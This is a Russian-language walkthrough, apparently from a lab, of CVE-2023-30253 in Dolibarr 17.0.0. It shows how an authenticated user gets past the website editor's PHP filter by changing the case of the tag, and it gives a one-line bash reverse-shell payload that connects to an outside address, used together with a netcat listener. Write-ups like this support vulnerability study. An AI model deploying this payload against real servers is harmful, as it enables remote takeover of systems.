
В Dolibarr 17.0.0 с включенным плагином CMS Website (ядро) аутентифицированный злоумышленник может получить удаленное выполнение команд с помощью внедрения PHP-кода, обходя ограничения приложения.
CVE-2023-30253 — это уязвимость безопасности в программном обеспечении Dolibarr, которая позволяет аутентифицированным пользователям выполнять удаленный код с помощью техники манипуляции заглавными буквами во вводимых данных.
Эта уязвимость может привести к несанкционированному удаленному выполнению кода злоумышленниками, что представляет серьезную угрозу безопасности и целостности затронутых систем. Уязвимость исправлена в Dolibarr 17.0.1.
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
https://github.com/Dolibarr/dolibarr
Следующий PoC показывает, как получить обратную оболочку вручную.

После входа в систему в качестве тестового пользователя мы можем создавать/изменять веб-сайт.
.png)
Сначала создайте веб-сайт, а затем создайте страницу.
.png)

После создания веб-сайта и страницы нажмите на значок бинокля, это откроет созданную страницу в новой вкладке.
Теперь нажмите «Редактировать исходный код HTML».
.png)
Здесь мы можем попробовать добавить PHP-код, но есть какой-то фильтр, не позволяющий написать PHP-код. Это можно легко обойти, изменив формат слова php.
.png)
После изменения формата слова php на pHp мы видим, что он успешно сохранен.
.png)
Перейдя на страницу, мы видим, что наш вставленный PHP-код работает.
Теперь, чтобы получить обратную оболочку, давайте настроим прослушиватель netcat
.png)
.png)
Затем добавьте наш код обратной оболочки <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>
Теперь, открыв веб-сайт, мы получаем обратную оболочку
.png)
Мы можем использовать код на Python, чтобы упростить задачу

Настройте прослушиватель netcat.

Запустите скрипт, и мы должны получить обратную оболочку.
